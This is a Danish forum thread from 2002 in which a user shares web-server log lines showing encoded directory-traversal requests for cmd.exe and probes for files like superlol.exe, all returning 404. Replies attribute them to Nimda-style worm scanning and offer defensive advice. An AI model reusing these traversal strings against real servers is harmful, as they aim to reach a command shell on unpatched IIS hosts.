14:33:18 147.29.115.214 HEAD /wwwroot/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%5c..%5cwinnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%2e..%2ewinnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:18 147.29.115.214 HEAD /wwwroot/..%2f..%2fwinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /.%2e/.%2e/winnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%5c..%5cwinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%5c..%5cwinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%2e..%2ewinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /..%2f..%2fwinnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /winnt/system32/cmd.exe 404
14:33:19 147.29.115.214 HEAD /scripts/superlol.exe 404
14:33:19 147.29.115.214 HEAD /msadc/superlol.exe 404
14:33:20 147.29.115.214 HEAD /wwwroot/superlol.exe 404
14:33:20 147.29.115.214 HEAD /images/superlol.exe 404
14:33:20 147.29.115.214 HEAD /samples/superlol.exe 404
14:33:20 147.29.115.214 HEAD /iissamples/superlol.exe 404
14:33:20 147.29.115.214 HEAD /adsamples/superlol.exe 404
14:33:20 147.29.115.214 HEAD /cgi-bin/superlol.exe 404
14:33:20 147.29.115.214 HEAD /iisadmpwd/superlol.exe 404
14:33:20 147.29.115.214 HEAD /msadc/spooler.exe 404
14:33:20 147.29.115.214 HEAD /msadc/spool.exe 404
Avatar billede cuddles Nybegynder
16. december 2002 - 10:58 #1
Det er i hvert tilfælde en, der leder efter exploits, så du kan vel godt melde det, hvis du vil.
Avatar billede johnstigers Seniormester
16. december 2002 - 11:00 #2
Avatar billede jinxit Nybegynder
16. december 2002 - 11:10 #3
147.29.115.214 : www.mtv-instituttet.dk (sundhedsstyrelsen)

Så jeg vil nok tro at det er en som keder sig voldsomt på arbejdet og derfor leder efter exploits... du burde nok anmelde det, så kan de selv finde ud af hvem det er.
Avatar billede karmapolice Nybegynder
16. december 2002 - 11:11 #4
Nej, der er diverse vira/viruser som lægger cmd.exe i en sti hvor den kan tilgås via http - andre vira udnytter så dette og prøver at sprede sig selv h.hj.a. cmd.exe.
Avatar billede bufferzone Praktikant
16. december 2002 - 11:12 #5
Det ligner et nimda, eller tilsvarende mailorm angreb, hvis din IIS er patchet med nyeste patches bør du ikke være bekyumret, jeg ville dog lige gennemscanne mit system for at være sikker.

Læs her

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/virus/nimda.asp
Avatar billede metal_hansen Nybegynder
16. december 2002 - 11:56 #6
tak for responsen!
Så hvad foreslår I at jeg så gør?!
melder det?! Og til hvem?! jeg kan se på whois-databasen at der er flere mulige....

og ang. min iis, så har den alle updates og patches :)
Jeg har lige scannet min puter igennem, og jeg har ingen virus eller trojans.
Avatar billede karmapolice Nybegynder
16. december 2002 - 12:01 #7
Der er ikke nogen pointe i at melde det. Det er ikke bevidste angreb...folk aner jo ikke at sådan en virus ligger i baggrunden og lurer. Men selvom du har alle patches kan din maskine stadig være ramt at virusen - jeg mener at den spreder sig via e-mail. Men da loggen viser 404 fejl over det hele, så skal du ikke bekymre dig.
Avatar billede metal_hansen Nybegynder
16. december 2002 - 12:16 #8
ok takker.
så lukker jeg igen
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester